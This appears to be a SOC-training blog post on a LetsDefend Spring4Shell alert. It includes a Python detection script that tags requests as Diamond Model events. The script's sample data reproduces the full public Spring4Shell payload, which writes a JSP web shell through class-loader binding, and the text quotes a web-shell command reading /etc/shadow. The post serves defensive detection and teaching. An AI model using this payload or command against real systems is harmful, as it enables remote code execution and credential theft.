

Diamond Model of Intrusion Analysis in Practice

3 min read · May 30, 2022


LetsDefend: SOC171-Spring4Shell

Diamond Model

Log Analysis

EventID 121
SOC171 — Spring4Shell Activity

Spring4Shell is a zero-day remote code execution (RCE) vulnerability in the Spring Framework. According to public reporting, successful exploitation lets the threat actor write arbitrary files on the server; the public proof of concept uses this to drop a JSP web shell under the Tomcat webroot and then run operating-system commands through it.

Suspicious parameters and the detection rules they triggered:

  • /tomcatwar.jsp?pwd=j&cmd=cat%20/etc/shadow in the request URL. The cmd value decodes to cat /etc/shadow, a command sent to the tomcatwar.jsp web shell that the public exploit drops; pwd=j is the shell's hard-coded password check.
  • java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di in the POST body. This decodes to java.io.InputStream in = %{c1}i, a fragment of the public Spring4Shell payload that is written into the web shell through class-loader property binding; %{c1}i is Tomcat access-log pattern syntax that expands to the value of the request header c1 (set to Runtime by the exploit).
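The two indicators above can be turned into a small detection that URL-decodes each request, flags the class-loader binding stage and the web-shell command stage separately, and emits the result as a Diamond Model event (adversary, infrastructure, capability, victim). The code below is an added example written for this page, not the LetsDefend rule or the author's own script; the sample requests, IP addresses, host names and port are constructed for illustration, and the request tuple layout is an assumption about how a SOC would hand parsed web-server logs to such a check.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample requests (assumption: not taken from the page's alert).
# Each entry is (src_ip, method, dst_host, dst_port, path_with_query, post_body).
SAMPLE_REQUESTS = [
    # Stage 1: the public Spring4Shell PoC binds Tomcat AccessLogValve properties
    # through the Spring class loader so that a JSP is written into webapps/ROOT.
    ("172.16.17.17", "POST", "10.10.10.5", 8082, "/",
     "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
     "%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20"
     "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec("
     "request.getParameter(%22cmd%22)).getInputStream()%3B%20%7D%20%25%7Bsuffix%7Di"
     "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
     "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
     "&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar"
     "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="),
    # Stage 2: the dropped web shell is called with a command.
    ("172.16.17.17", "GET", "10.10.10.5", 8082,
     "/tomcatwar.jsp?pwd=j&cmd=cat%20/etc/shadow", ""),
    # Benign request for contrast.
    ("10.10.10.20", "GET", "10.10.10.5", 8082, "/index.html", ""),
]

# Property prefix abused by the exploit and strings that appear in the PoC payload
# once the POST body has been URL-decoded.
CLASSLOADER_PREFIX = "class.module.classLoader"
PAYLOAD_MARKERS = ("java.io.InputStream in =", "%{c1}i", "%{c2}i", "getRuntime().exec(")


def classify_request(req):
    """Return the list of Spring4Shell-related findings for one request."""
    _src, _method, _host, _port, target, body = req
    findings = []

    # Stage 1 indicators live in the POST body. parse_qs decodes each value once,
    # so %25%7Bc1%7Di becomes %{c1}i, which is what we match against.
    params = parse_qs(body, keep_blank_values=True)
    if any(key.startswith(CLASSLOADER_PREFIX) for key in params):
        findings.append("classloader-binding")
    decoded_body = unquote(body)
    if any(marker in decoded_body for marker in PAYLOAD_MARKERS):
        findings.append("spring4shell-payload")

    # Stage 2 indicator: a JSP reached with both a password and a command parameter.
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    if parts.path.lower().endswith(".jsp") and {"pwd", "cmd"}.issubset(query):
        findings.append("webshell-command")
    return findings


def webshell_command(req):
    """Return the decoded command sent to the web shell, or None if there is none."""
    query = parse_qs(urlsplit(req[4]).query)
    return query["cmd"][0] if "cmd" in query else None


def diamond_event(req, findings):
    """Map one detected request onto the four Diamond Model vertices."""
    src, method, host, port, target, _body = req
    return {
        # Attribution is not known from a single request; leave the vertex open.
        "adversary": "unknown",
        "infrastructure": src,
        "capability": {
            "findings": findings,
            "request": f"{method} {target}",
            "command": webshell_command(req),
        },
        "victim": f"{host}:{port} (Spring application)",
    }


def analyze(requests):
    """Run the detection over every request and keep only the hits."""
    events = []
    for req in requests:
        findings = classify_request(req)
        if findings:
            events.append(diamond_event(req, findings))
    return events


if __name__ == "__main__":
    for event in analyze(SAMPLE_REQUESTS):
        print(event)
```

The two stages are reported separately on purpose: a POST carrying class.module.classLoader properties is the exploitation attempt and is worth an alert even if no web shell is ever seen, while a hit on the .jsp with pwd and cmd parameters means the file write succeeded and the host should be treated as compromised. Both events share the same source address, which is what lets the analyst pivot on the infrastructure vertex and tie the earlier port scan to the same activity thread.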
Affected SpringServer
Log Analysis

An attacker conducted port scanning and then attempted to exploit the service on port 8082 using the Spring4Shell vulnerability. Assuming the attack…

